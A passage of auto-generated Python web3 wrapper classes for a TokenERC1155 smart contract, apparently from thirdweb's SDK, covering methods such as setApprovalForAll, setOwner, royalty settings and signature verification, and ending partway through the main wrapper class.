class SaleRecipientForTokenMethod(
ContractMethod
): # pylint: disable=invalid-name
"""Various interfaces to the saleRecipientForToken method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, index_0: int):
"""Validate the inputs to the saleRecipientForToken method."""
self.validator.assert_valid(
method_name="saleRecipientForToken",
parameter_name="index_0",
argument_value=index_0,
)
# safeguard against fractional inputs
index_0 = int(index_0)
return index_0
def call(self, index_0: int, tx_params: Optional[TxParams] = None) -> str:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(index_0) = self.validate_and_normalize_inputs(index_0)
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method(index_0).call(tx_params.as_dict())
return str(returned)
def send_transaction(
self, index_0: int, tx_params: Optional[TxParams] = None
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(index_0) = self.validate_and_normalize_inputs(index_0)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(index_0).transact(tx_params.as_dict())
def build_transaction(
self, index_0: int, tx_params: Optional[TxParams] = None
) -> dict:
"""Construct calldata to be used as input to the method."""
(index_0) = self.validate_and_normalize_inputs(index_0)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(index_0).buildTransaction(
tx_params.as_dict()
)
def estimate_gas(
self, index_0: int, tx_params: Optional[TxParams] = None
) -> int:
"""Estimate gas consumption of method call."""
(index_0) = self.validate_and_normalize_inputs(index_0)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(index_0).estimateGas(
tx_params.as_dict()
)
class SetApprovalForAllMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the setApprovalForAll method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, operator: str, approved: bool):
"""Validate the inputs to the setApprovalForAll method."""
self.validator.assert_valid(
method_name="setApprovalForAll",
parameter_name="operator",
argument_value=operator,
)
operator = self.validate_and_checksum_address(operator)
self.validator.assert_valid(
method_name="setApprovalForAll",
parameter_name="approved",
argument_value=approved,
)
return (operator, approved)
def call(
self,
operator: str,
approved: bool,
tx_params: Optional[TxParams] = None,
) -> None:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(operator, approved) = self.validate_and_normalize_inputs(
operator, approved
)
tx_params = super().normalize_tx_params(tx_params)
self._underlying_method(operator, approved).call(tx_params.as_dict())
def send_transaction(
self,
operator: str,
approved: bool,
tx_params: Optional[TxParams] = None,
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(operator, approved) = self.validate_and_normalize_inputs(
operator, approved
)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(operator, approved).transact(
tx_params.as_dict()
)
def build_transaction(
self,
operator: str,
approved: bool,
tx_params: Optional[TxParams] = None,
) -> dict:
"""Construct calldata to be used as input to the method."""
(operator, approved) = self.validate_and_normalize_inputs(
operator, approved
)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(operator, approved).buildTransaction(
tx_params.as_dict()
)
def estimate_gas(
self,
operator: str,
approved: bool,
tx_params: Optional[TxParams] = None,
) -> int:
"""Estimate gas consumption of method call."""
(operator, approved) = self.validate_and_normalize_inputs(
operator, approved
)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(operator, approved).estimateGas(
tx_params.as_dict()
)
class SetContractUriMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the setContractURI method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, uri: str):
"""Validate the inputs to the setContractURI method."""
self.validator.assert_valid(
method_name="setContractURI",
parameter_name="_uri",
argument_value=uri,
)
return uri
def call(self, uri: str, tx_params: Optional[TxParams] = None) -> None:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(uri) = self.validate_and_normalize_inputs(uri)
tx_params = super().normalize_tx_params(tx_params)
self._underlying_method(uri).call(tx_params.as_dict())
def send_transaction(
self, uri: str, tx_params: Optional[TxParams] = None
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(uri) = self.validate_and_normalize_inputs(uri)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(uri).transact(tx_params.as_dict())
def build_transaction(
self, uri: str, tx_params: Optional[TxParams] = None
) -> dict:
"""Construct calldata to be used as input to the method."""
(uri) = self.validate_and_normalize_inputs(uri)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(uri).buildTransaction(
tx_params.as_dict()
)
def estimate_gas(
self, uri: str, tx_params: Optional[TxParams] = None
) -> int:
"""Estimate gas consumption of method call."""
(uri) = self.validate_and_normalize_inputs(uri)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(uri).estimateGas(tx_params.as_dict())
class SetDefaultRoyaltyInfoMethod(
ContractMethod
): # pylint: disable=invalid-name
"""Various interfaces to the setDefaultRoyaltyInfo method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(
self, royalty_recipient: str, royalty_bps: int
):
"""Validate the inputs to the setDefaultRoyaltyInfo method."""
self.validator.assert_valid(
method_name="setDefaultRoyaltyInfo",
parameter_name="_royaltyRecipient",
argument_value=royalty_recipient,
)
royalty_recipient = self.validate_and_checksum_address(
royalty_recipient
)
self.validator.assert_valid(
method_name="setDefaultRoyaltyInfo",
parameter_name="_royaltyBps",
argument_value=royalty_bps,
)
# safeguard against fractional inputs
royalty_bps = int(royalty_bps)
return (royalty_recipient, royalty_bps)
def call(
self,
royalty_recipient: str,
royalty_bps: int,
tx_params: Optional[TxParams] = None,
) -> None:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(royalty_recipient, royalty_bps) = self.validate_and_normalize_inputs(
royalty_recipient, royalty_bps
)
tx_params = super().normalize_tx_params(tx_params)
self._underlying_method(royalty_recipient, royalty_bps).call(
tx_params.as_dict()
)
def send_transaction(
self,
royalty_recipient: str,
royalty_bps: int,
tx_params: Optional[TxParams] = None,
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(royalty_recipient, royalty_bps) = self.validate_and_normalize_inputs(
royalty_recipient, royalty_bps
)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(
royalty_recipient, royalty_bps
).transact(tx_params.as_dict())
def build_transaction(
self,
royalty_recipient: str,
royalty_bps: int,
tx_params: Optional[TxParams] = None,
) -> dict:
"""Construct calldata to be used as input to the method."""
(royalty_recipient, royalty_bps) = self.validate_and_normalize_inputs(
royalty_recipient, royalty_bps
)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(
royalty_recipient, royalty_bps
).buildTransaction(tx_params.as_dict())
def estimate_gas(
self,
royalty_recipient: str,
royalty_bps: int,
tx_params: Optional[TxParams] = None,
) -> int:
"""Estimate gas consumption of method call."""
(royalty_recipient, royalty_bps) = self.validate_and_normalize_inputs(
royalty_recipient, royalty_bps
)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(
royalty_recipient, royalty_bps
).estimateGas(tx_params.as_dict())
class SetOwnerMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the setOwner method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, new_owner: str):
"""Validate the inputs to the setOwner method."""
self.validator.assert_valid(
method_name="setOwner",
parameter_name="_newOwner",
argument_value=new_owner,
)
new_owner = self.validate_and_checksum_address(new_owner)
return new_owner
def call(
self, new_owner: str, tx_params: Optional[TxParams] = None
) -> None:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(new_owner) = self.validate_and_normalize_inputs(new_owner)
tx_params = super().normalize_tx_params(tx_params)
self._underlying_method(new_owner).call(tx_params.as_dict())
def send_transaction(
self, new_owner: str, tx_params: Optional[TxParams] = None
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(new_owner) = self.validate_and_normalize_inputs(new_owner)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(new_owner).transact(tx_params.as_dict())
def build_transaction(
self, new_owner: str, tx_params: Optional[TxParams] = None
) -> dict:
"""Construct calldata to be used as input to the method."""
(new_owner) = self.validate_and_normalize_inputs(new_owner)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(new_owner).buildTransaction(
tx_params.as_dict()
)
def estimate_gas(
self, new_owner: str, tx_params: Optional[TxParams] = None
) -> int:
"""Estimate gas consumption of method call."""
(new_owner) = self.validate_and_normalize_inputs(new_owner)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(new_owner).estimateGas(
tx_params.as_dict()
)
class SetPlatformFeeInfoMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the setPlatformFeeInfo method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(
self, platform_fee_recipient: str, platform_fee_bps: int
):
"""Validate the inputs to the setPlatformFeeInfo method."""
self.validator.assert_valid(
method_name="setPlatformFeeInfo",
parameter_name="_platformFeeRecipient",
argument_value=platform_fee_recipient,
)
platform_fee_recipient = self.validate_and_checksum_address(
platform_fee_recipient
)
self.validator.assert_valid(
method_name="setPlatformFeeInfo",
parameter_name="_platformFeeBps",
argument_value=platform_fee_bps,
)
# safeguard against fractional inputs
platform_fee_bps = int(platform_fee_bps)
return (platform_fee_recipient, platform_fee_bps)
def call(
self,
platform_fee_recipient: str,
platform_fee_bps: int,
tx_params: Optional[TxParams] = None,
) -> None:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(
platform_fee_recipient,
platform_fee_bps,
) = self.validate_and_normalize_inputs(
platform_fee_recipient, platform_fee_bps
)
tx_params = super().normalize_tx_params(tx_params)
self._underlying_method(platform_fee_recipient, platform_fee_bps).call(
tx_params.as_dict()
)
def send_transaction(
self,
platform_fee_recipient: str,
platform_fee_bps: int,
tx_params: Optional[TxParams] = None,
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(
platform_fee_recipient,
platform_fee_bps,
) = self.validate_and_normalize_inputs(
platform_fee_recipient, platform_fee_bps
)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(
platform_fee_recipient, platform_fee_bps
).transact(tx_params.as_dict())
def build_transaction(
self,
platform_fee_recipient: str,
platform_fee_bps: int,
tx_params: Optional[TxParams] = None,
) -> dict:
"""Construct calldata to be used as input to the method."""
(
platform_fee_recipient,
platform_fee_bps,
) = self.validate_and_normalize_inputs(
platform_fee_recipient, platform_fee_bps
)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(
platform_fee_recipient, platform_fee_bps
).buildTransaction(tx_params.as_dict())
def estimate_gas(
self,
platform_fee_recipient: str,
platform_fee_bps: int,
tx_params: Optional[TxParams] = None,
) -> int:
"""Estimate gas consumption of method call."""
(
platform_fee_recipient,
platform_fee_bps,
) = self.validate_and_normalize_inputs(
platform_fee_recipient, platform_fee_bps
)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(
platform_fee_recipient, platform_fee_bps
).estimateGas(tx_params.as_dict())
class SetPrimarySaleRecipientMethod(
ContractMethod
): # pylint: disable=invalid-name
"""Various interfaces to the setPrimarySaleRecipient method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, sale_recipient: str):
"""Validate the inputs to the setPrimarySaleRecipient method."""
self.validator.assert_valid(
method_name="setPrimarySaleRecipient",
parameter_name="_saleRecipient",
argument_value=sale_recipient,
)
sale_recipient = self.validate_and_checksum_address(sale_recipient)
return sale_recipient
def call(
self, sale_recipient: str, tx_params: Optional[TxParams] = None
) -> None:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(sale_recipient) = self.validate_and_normalize_inputs(sale_recipient)
tx_params = super().normalize_tx_params(tx_params)
self._underlying_method(sale_recipient).call(tx_params.as_dict())
def send_transaction(
self, sale_recipient: str, tx_params: Optional[TxParams] = None
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(sale_recipient) = self.validate_and_normalize_inputs(sale_recipient)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(sale_recipient).transact(
tx_params.as_dict()
)
def build_transaction(
self, sale_recipient: str, tx_params: Optional[TxParams] = None
) -> dict:
"""Construct calldata to be used as input to the method."""
(sale_recipient) = self.validate_and_normalize_inputs(sale_recipient)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(sale_recipient).buildTransaction(
tx_params.as_dict()
)
def estimate_gas(
self, sale_recipient: str, tx_params: Optional[TxParams] = None
) -> int:
"""Estimate gas consumption of method call."""
(sale_recipient) = self.validate_and_normalize_inputs(sale_recipient)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(sale_recipient).estimateGas(
tx_params.as_dict()
)
class SetRoyaltyInfoForTokenMethod(
ContractMethod
): # pylint: disable=invalid-name
"""Various interfaces to the setRoyaltyInfoForToken method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(
self, token_id: int, recipient: str, bps: int
):
"""Validate the inputs to the setRoyaltyInfoForToken method."""
self.validator.assert_valid(
method_name="setRoyaltyInfoForToken",
parameter_name="_tokenId",
argument_value=token_id,
)
# safeguard against fractional inputs
token_id = int(token_id)
self.validator.assert_valid(
method_name="setRoyaltyInfoForToken",
parameter_name="_recipient",
argument_value=recipient,
)
recipient = self.validate_and_checksum_address(recipient)
self.validator.assert_valid(
method_name="setRoyaltyInfoForToken",
parameter_name="_bps",
argument_value=bps,
)
# safeguard against fractional inputs
bps = int(bps)
return (token_id, recipient, bps)
def call(
self,
token_id: int,
recipient: str,
bps: int,
tx_params: Optional[TxParams] = None,
) -> None:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(token_id, recipient, bps) = self.validate_and_normalize_inputs(
token_id, recipient, bps
)
tx_params = super().normalize_tx_params(tx_params)
self._underlying_method(token_id, recipient, bps).call(
tx_params.as_dict()
)
def send_transaction(
self,
token_id: int,
recipient: str,
bps: int,
tx_params: Optional[TxParams] = None,
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(token_id, recipient, bps) = self.validate_and_normalize_inputs(
token_id, recipient, bps
)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(token_id, recipient, bps).transact(
tx_params.as_dict()
)
def build_transaction(
self,
token_id: int,
recipient: str,
bps: int,
tx_params: Optional[TxParams] = None,
) -> dict:
"""Construct calldata to be used as input to the method."""
(token_id, recipient, bps) = self.validate_and_normalize_inputs(
token_id, recipient, bps
)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(
token_id, recipient, bps
).buildTransaction(tx_params.as_dict())
def estimate_gas(
self,
token_id: int,
recipient: str,
bps: int,
tx_params: Optional[TxParams] = None,
) -> int:
"""Estimate gas consumption of method call."""
(token_id, recipient, bps) = self.validate_and_normalize_inputs(
token_id, recipient, bps
)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(token_id, recipient, bps).estimateGas(
tx_params.as_dict()
)
class SupportsInterfaceMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the supportsInterface method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, interface_id: Union[bytes, str]):
"""Validate the inputs to the supportsInterface method."""
self.validator.assert_valid(
method_name="supportsInterface",
parameter_name="interfaceId",
argument_value=interface_id,
)
return interface_id
def call(
self,
interface_id: Union[bytes, str],
tx_params: Optional[TxParams] = None,
) -> bool:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(interface_id) = self.validate_and_normalize_inputs(interface_id)
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method(interface_id).call(
tx_params.as_dict()
)
return bool(returned)
def send_transaction(
self,
interface_id: Union[bytes, str],
tx_params: Optional[TxParams] = None,
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(interface_id) = self.validate_and_normalize_inputs(interface_id)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(interface_id).transact(
tx_params.as_dict()
)
def build_transaction(
self,
interface_id: Union[bytes, str],
tx_params: Optional[TxParams] = None,
) -> dict:
"""Construct calldata to be used as input to the method."""
(interface_id) = self.validate_and_normalize_inputs(interface_id)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(interface_id).buildTransaction(
tx_params.as_dict()
)
def estimate_gas(
self,
interface_id: Union[bytes, str],
tx_params: Optional[TxParams] = None,
) -> int:
"""Estimate gas consumption of method call."""
(interface_id) = self.validate_and_normalize_inputs(interface_id)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(interface_id).estimateGas(
tx_params.as_dict()
)
class SymbolMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the symbol method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address)
self._underlying_method = contract_function
def call(self, tx_params: Optional[TxParams] = None) -> str:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method().call(tx_params.as_dict())
return str(returned)
def send_transaction(
self, tx_params: Optional[TxParams] = None
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().transact(tx_params.as_dict())
def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().buildTransaction(tx_params.as_dict())
def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().estimateGas(tx_params.as_dict())
class ThirdwebFeeMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the thirdwebFee method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address)
self._underlying_method = contract_function
def call(self, tx_params: Optional[TxParams] = None) -> str:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method().call(tx_params.as_dict())
return str(returned)
def send_transaction(
self, tx_params: Optional[TxParams] = None
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().transact(tx_params.as_dict())
def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().buildTransaction(tx_params.as_dict())
def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().estimateGas(tx_params.as_dict())
class TotalSupplyMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the totalSupply method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, index_0: int):
"""Validate the inputs to the totalSupply method."""
self.validator.assert_valid(
method_name="totalSupply",
parameter_name="index_0",
argument_value=index_0,
)
# safeguard against fractional inputs
index_0 = int(index_0)
return index_0
def call(self, index_0: int, tx_params: Optional[TxParams] = None) -> int:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(index_0) = self.validate_and_normalize_inputs(index_0)
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method(index_0).call(tx_params.as_dict())
return int(returned)
def send_transaction(
self, index_0: int, tx_params: Optional[TxParams] = None
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(index_0) = self.validate_and_normalize_inputs(index_0)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(index_0).transact(tx_params.as_dict())
def build_transaction(
self, index_0: int, tx_params: Optional[TxParams] = None
) -> dict:
"""Construct calldata to be used as input to the method."""
(index_0) = self.validate_and_normalize_inputs(index_0)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(index_0).buildTransaction(
tx_params.as_dict()
)
def estimate_gas(
self, index_0: int, tx_params: Optional[TxParams] = None
) -> int:
"""Estimate gas consumption of method call."""
(index_0) = self.validate_and_normalize_inputs(index_0)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(index_0).estimateGas(
tx_params.as_dict()
)
class UriMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the uri method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, token_id: int):
"""Validate the inputs to the uri method."""
self.validator.assert_valid(
method_name="uri",
parameter_name="_tokenId",
argument_value=token_id,
)
# safeguard against fractional inputs
token_id = int(token_id)
return token_id
def call(self, token_id: int, tx_params: Optional[TxParams] = None) -> str:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(token_id) = self.validate_and_normalize_inputs(token_id)
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method(token_id).call(tx_params.as_dict())
return str(returned)
def send_transaction(
self, token_id: int, tx_params: Optional[TxParams] = None
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(token_id) = self.validate_and_normalize_inputs(token_id)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(token_id).transact(tx_params.as_dict())
def build_transaction(
self, token_id: int, tx_params: Optional[TxParams] = None
) -> dict:
"""Construct calldata to be used as input to the method."""
(token_id) = self.validate_and_normalize_inputs(token_id)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(token_id).buildTransaction(
tx_params.as_dict()
)
def estimate_gas(
self, token_id: int, tx_params: Optional[TxParams] = None
) -> int:
"""Estimate gas consumption of method call."""
(token_id) = self.validate_and_normalize_inputs(token_id)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(token_id).estimateGas(
tx_params.as_dict()
)
class VerifyMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the verify method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(
self, req: ITokenERC1155MintRequest, signature: Union[bytes, str]
):
"""Validate the inputs to the verify method."""
self.validator.assert_valid(
method_name="verify",
parameter_name="_req",
argument_value=req,
)
self.validator.assert_valid(
method_name="verify",
parameter_name="_signature",
argument_value=signature,
)
return (req, signature)
def call(
self,
req: ITokenERC1155MintRequest,
signature: Union[bytes, str],
tx_params: Optional[TxParams] = None,
) -> Tuple[bool, str]:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(req, signature) = self.validate_and_normalize_inputs(req, signature)
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method(req, signature).call(
tx_params.as_dict()
)
return (
returned[0],
returned[1],
)
def send_transaction(
self,
req: ITokenERC1155MintRequest,
signature: Union[bytes, str],
tx_params: Optional[TxParams] = None,
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(req, signature) = self.validate_and_normalize_inputs(req, signature)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(req, signature).transact(
tx_params.as_dict()
)
def build_transaction(
self,
req: ITokenERC1155MintRequest,
signature: Union[bytes, str],
tx_params: Optional[TxParams] = None,
) -> dict:
"""Construct calldata to be used as input to the method."""
(req, signature) = self.validate_and_normalize_inputs(req, signature)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(req, signature).buildTransaction(
tx_params.as_dict()
)
def estimate_gas(
self,
req: ITokenERC1155MintRequest,
signature: Union[bytes, str],
tx_params: Optional[TxParams] = None,
) -> int:
"""Estimate gas consumption of method call."""
(req, signature) = self.validate_and_normalize_inputs(req, signature)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(req, signature).estimateGas(
tx_params.as_dict()
)
# pylint: disable=too-many-public-methods,too-many-instance-attributes
class TokenERC1155:
"""Wrapper class for TokenERC1155 Solidity contract.
All method parameters of type `bytes`:code: should be encoded as UTF-8,
which can be accomplished via `str.encode("utf_8")`:code:.
"""
default_admin_role: DefaultAdminRoleMethod
"""Constructor-initialized instance of
:class:`DefaultAdminRoleMethod`.
"""
balance_of: BalanceOfMethod
"""Constructor-initialized instance of
:class:`BalanceOfMethod`.
"""
balance_of_batch: BalanceOfBatchMethod
"""Constructor-initialized instance of
:class:`BalanceOfBatchMethod`.
"""
burn: BurnMethod
"""Constructor-initialized instance of
:class:`BurnMethod`.
"""
burn_batch: BurnBatchMethod
"""Constructor-initialized instance of
:class:`BurnBatchMethod`.
"""
contract_type: ContractTypeMethod
"""Constructor-initialized instance of
:class:`ContractTypeMethod`.
"""
contract_uri: ContractUriMethod
"""Constructor-initialized instance of
:class:`ContractUriMethod`.
"""
contract_version: ContractVersionMethod
"""Constructor-initialized instance of
:class:`ContractVersionMethod`.
"""
get_default_royalty_info: GetDefaultRoyaltyInfoMethod
"""Constructor-initialized instance of
:class:`GetDefaultRoyaltyInfoMethod`.
"""
get_platform_fee_info: GetPlatformFeeInfoMethod
"""Constructor-initialized instance of
:class:`GetPlatformFeeInfoMethod`.
"""
get_role_admin: GetRoleAdminMethod
"""Constructor-initialized instance of
:class:`GetRoleAdminMethod`.
"""
get_role_member: GetRoleMemberMethod
"""Constructor-initialized instance of
:class:`GetRoleMemberMethod`.
"""
get_role_member_count: GetRoleMemberCountMethod
"""Constructor-initialized instance of
:class:`GetRoleMemberCountMethod`.
"""
get_royalty_info_for_token: GetRoyaltyInfoForTokenMethod
"""Constructor-initialized instance of
:class:`GetRoyaltyInfoForTokenMethod`.
"""
grant_role: GrantRoleMethod
"""Constructor-initialized instance of
:class:`GrantRoleMethod`.
"""
has_role: HasRoleMethod
"""Constructor-initialized instance of
:class:`HasRoleMethod`.
"""
initialize: InitializeMethod
"""Constructor-initialized instance of
:class:`InitializeMethod`.
"""
is_approved_for_all: IsApprovedForAllMethod
"""Constructor-initialized instance of
:class:`IsApprovedForAllMethod`.
"""
is_trusted_forwarder: IsTrustedForwarderMethod
"""Constructor-initialized instance of
:class:`IsTrustedForwarderMethod`.
"""
mint_to: MintToMethod
"""Constructor-initialized instance of
:class:`MintToMethod`.
"""
mint_with_signature: MintWithSignatureMethod
"""Constructor-initialized instance of
:class:`MintWithSignatureMethod`.
"""
multicall: MulticallMethod
"""Constructor-initialized instance of
:class:`MulticallMethod`.
"""
name: NameMethod
"""Constructor-initialized instance of
:class:`NameMethod`.
"""
next_token_id_to_mint: NextTokenIdToMintMethod
"""Constructor-initialized instance of
:class:`NextTokenIdToMintMethod`.
"""
owner: OwnerMethod
"""Constructor-initialized instance of
:class:`OwnerMethod`.
"""
platform_fee_bps: PlatformFeeBpsMethod
